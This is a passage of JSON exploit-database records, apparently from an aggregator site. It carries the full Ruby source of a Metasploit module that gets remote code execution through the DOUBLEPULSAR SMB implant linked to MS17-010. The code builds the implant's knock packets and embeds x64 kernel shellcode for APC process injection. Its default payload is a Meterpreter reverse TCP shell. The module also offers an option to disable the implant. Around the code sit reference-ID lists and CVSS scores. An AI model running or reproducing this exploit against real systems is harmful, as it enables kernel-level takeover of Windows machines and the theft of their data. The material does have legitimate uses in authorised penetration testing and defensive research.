["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:12:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-02T22:12:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' 
=> 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-03] #"}, "lastseen": "2021-11-02T22:12:39", "differentElements": ["sourceData"], "edition": 63}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a5fcff187ff677ee08dc8255f9f826bf", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant. Code execution is only supported against x64 implants (an x86 implant is detected by the check but not exploited), and the module ships with the advanced option DefangedMode enabled, so both targets refuse to run until it is explicitly disabled; the accompanying warning notes that interacting with the implant may contaminate forensic evidence on a host under investigation, and the module's stability rating is CRASH_OS_DOWN.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-03T22:13:48", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": 